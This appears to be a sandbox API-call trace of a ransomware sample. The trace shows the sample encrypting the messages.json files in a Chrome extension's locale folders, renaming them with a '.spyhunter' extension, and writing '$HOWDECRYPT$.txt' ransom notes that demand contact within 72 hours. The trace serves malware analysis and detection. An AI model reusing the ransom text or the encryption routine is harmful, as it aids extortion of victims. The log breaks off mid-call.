GetProcessHeap () returned 0x2c0000 [0157.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.180] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eb14*=0x2800, lpOverlapped=0x0) returned 1 [0157.194] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.194] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eb14*=0x2800, lpOverlapped=0x0) returned 1 [0157.195] GetProcessHeap () returned 0x2c0000 [0157.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.195] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.195] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb14, lpOverlapped=0x0 | out: lpBuffer=0x57eb54*, lpNumberOfBytesWritten=0x57eb14*=0x4, lpOverlapped=0x0) returned 1 [0157.195] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb14*=0x30, lpOverlapped=0x0) returned 1 [0157.195] CloseHandle (hObject=0x9c) returned 1 [0157.195] GetProcessHeap () returned 0x2c0000 [0157.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.195] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.spyhunter") returned 174 [0157.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\messages.json.spyhunter")) returned 1 [0157.196] GetProcessHeap () returned 0x2c0000 [0157.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.196] GetProcessHeap () returned 0x2c0000 [0157.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.196] GetProcessHeap () returned 0x2c0000 [0157.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb86d8 | out: hHeap=0x2c0000) returned 1 [0157.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.197] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.197] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea8b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x57ea8b*, lpNumberOfBytesWritten=0x57ebb4*=0x127, lpOverlapped=0x0) returned 1 [0157.198] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.198] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ebb4*=0x2ac, lpOverlapped=0x0) returned 1 [0157.198] CloseHandle (hObject=0x9c) returned 1 [0157.198] GetProcessHeap () returned 0x2c0000 [0157.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb7d48 | out: hHeap=0x2c0000) returned 1 [0157.198] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb50 | out: pbBuffer=0x57eb50) returned 1 [0157.199] GetProcessHeap () returned 0x2c0000 [0157.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.199] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb48*=0x30) returned 1 [0157.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json") returned 164 [0157.199] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.199] GetProcessHeap () returned 0x2c0000 [0157.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.200] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eb0c*=0x2800, lpOverlapped=0x0) returned 1 [0157.209] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.209] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eb0c*=0x2800, lpOverlapped=0x0) returned 1 [0157.209] GetProcessHeap () returned 0x2c0000 [0157.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.209] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.209] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb0c, lpOverlapped=0x0 | out: lpBuffer=0x57eb4c*, lpNumberOfBytesWritten=0x57eb0c*=0x4, lpOverlapped=0x0) returned 1 [0157.209] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb0c*=0x30, lpOverlapped=0x0) returned 1 [0157.209] CloseHandle (hObject=0x9c) returned 1 [0157.209] GetProcessHeap () returned 0x2c0000 [0157.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.209] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.spyhunter") returned 174 [0157.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0157.210] GetProcessHeap () returned 0x2c0000 [0157.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.210] GetProcessHeap () returned 0x2c0000 [0157.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.211] GetProcessHeap () returned 0x2c0000 [0157.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb7bb0 | out: hHeap=0x2c0000) returned 1 [0157.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.211] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.211] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x57ea83*, lpNumberOfBytesWritten=0x57ebac*=0x127, lpOverlapped=0x0) returned 1 [0157.212] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.212] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ebac*=0x2ac, lpOverlapped=0x0) returned 1 [0157.212] CloseHandle (hObject=0x9c) returned 1 [0157.212] GetProcessHeap () returned 0x2c0000 [0157.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5a00 | out: hHeap=0x2c0000) returned 1 [0157.213] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb48 | out: pbBuffer=0x57eb48) returned 1 [0157.213] GetProcessHeap () returned 0x2c0000 [0157.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.213] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb40*=0x30) returned 1 [0157.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0157.213] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.213] GetProcessHeap () returned 0x2c0000 [0157.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.214] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eb04*=0x2800, lpOverlapped=0x0) returned 1 [0157.231] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.231] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eb04*=0x2800, lpOverlapped=0x0) returned 1 [0157.231] GetProcessHeap () returned 0x2c0000 [0157.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.231] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.232] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb04, lpOverlapped=0x0 | out: lpBuffer=0x57eb44*, lpNumberOfBytesWritten=0x57eb04*=0x4, lpOverlapped=0x0) returned 1 [0157.232] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb04*=0x30, lpOverlapped=0x0) returned 1 [0157.232] CloseHandle (hObject=0x9c) returned 1 [0157.232] GetProcessHeap () returned 0x2c0000 [0157.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.232] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.spyhunter") returned 174 [0157.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0157.234] GetProcessHeap () returned 0x2c0000 [0157.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.235] GetProcessHeap () returned 0x2c0000 [0157.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0157.235] GetProcessHeap () returned 0x2c0000 [0157.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5868 | out: hHeap=0x2c0000) returned 1 [0157.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.236] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.236] WriteFile (in: hFile=0x9c, lpBuffer=0x57ea7b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eba4, lpOverlapped=0x0 | out: lpBuffer=0x57ea7b*, lpNumberOfBytesWritten=0x57eba4*=0x127, lpOverlapped=0x0) returned 1 [0157.236] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.236] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eba4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eba4*=0x2ac, lpOverlapped=0x0) returned 1 [0157.237] CloseHandle (hObject=0x9c) returned 1 [0157.237] GetProcessHeap () returned 0x2c0000 [0157.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe4ba8 | out: hHeap=0x2c0000) returned 1 [0157.237] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb40 | out: pbBuffer=0x57eb40) returned 1 [0157.237] GetProcessHeap () returned 0x2c0000 [0157.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0157.237] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb38*=0x30) returned 1 [0157.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0157.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0157.238] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.238] GetProcessHeap () returned 0x2c0000 [0157.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.238] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57eafc*=0x2800, lpOverlapped=0x0) returned 1 [0157.255] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.255] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57eafc*=0x2800, lpOverlapped=0x0) returned 1 [0157.255] GetProcessHeap () returned 0x2c0000 [0157.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.255] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.255] WriteFile (in: hFile=0x9c, lpBuffer=0x57eb3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eafc, lpOverlapped=0x0 | out: lpBuffer=0x57eb3c*, lpNumberOfBytesWritten=0x57eafc*=0x4, lpOverlapped=0x0) returned 1 [0157.256] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eafc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eafc*=0x30, lpOverlapped=0x0) returned 1 [0157.256] CloseHandle (hObject=0x9c) returned 1 [0157.256] GetProcessHeap () returned 0x2c0000 [0157.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.256] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.spyhunter") returned 174 [0157.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 